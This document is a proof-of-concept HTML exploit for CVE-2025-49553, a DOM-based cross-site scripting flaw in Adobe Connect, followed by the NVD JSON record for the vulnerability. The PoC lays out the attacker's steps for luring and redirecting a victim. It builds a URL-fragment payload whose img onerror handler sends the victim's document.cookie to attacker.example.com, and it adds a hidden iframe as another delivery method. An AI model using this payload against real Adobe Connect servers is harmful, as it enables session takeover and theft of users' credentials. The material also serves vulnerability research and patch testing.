CVE-2025-49553

<!-- PoC for CVE-2025-49553 - Adobe Connect DOM-based XSS The malicious payload is delivered via URL fragment (location.hash) and executed when Adobe Connect's client-side JS writes it to the DOM. --> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>CVE-2025-49553 PoC</title> </head> <body> <h1>CVE-2025-49553 - Adobe Connect DOM-based XSS PoC</h1> <!-- Step 1: Attacker hosts this page or sends the malicious URL directly. Step 2: Victim is lured to click the crafted Adobe Connect URL. Step 3: The JS below auto-redirects the victim to the vulnerable Adobe Connect endpoint with a malicious fragment payload. --> <script> // Target Adobe Connect instance (replace with actual host) var target = "https://vulnerable-connect.example.com/"; // Malicious payload executed in victim's browser context // Demonstrates session cookie theft / arbitrary JS execution var payload = "<img src=x onerror=\"" + "var d=document,s=d.createElement('script');" + "s.src='https://attacker.example.com/steal?c='+encodeURIComponent(d.cookie);" + "d.body.appendChild(s);" + "\">"; // Encode and append as URL fragment to trigger DOM-based XSS var maliciousUrl = target + "#" + encodeURIComponent(payload); // Auto-redirect victim to the crafted URL window.location.href = maliciousUrl; // Alternative: direct iframe-based delivery // document.write('<iframe src="' + maliciousUrl + '" width="0" height="0"></iframe>'); </script> </body> </html>

{"cve": {"id": "CVE-2025-49553", "sourceIdentifier": "[email protected]", "published": "2025-10-14T22:15:37.860", "lastModified": "2025-10-17T14:59:03.537", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Adobe Connect versions 12.9 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by an attacker to execute malicious scripts in a victim's browser. Exploitation of this issue requires user interaction in that a victim must navigate to a crafted web page. A successful attacker can abuse this to achieve session takeover, increasing the confidentiality and integrity impact as high. Scope is changed."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:connect:*:*:*:*:*:-:*:*", "versionEndExcluding": "12.10", "matchCriteriaId": "FE8202C5-1060-4C83-B5D6-ECB75864C63F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/connect/apsb25-70.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}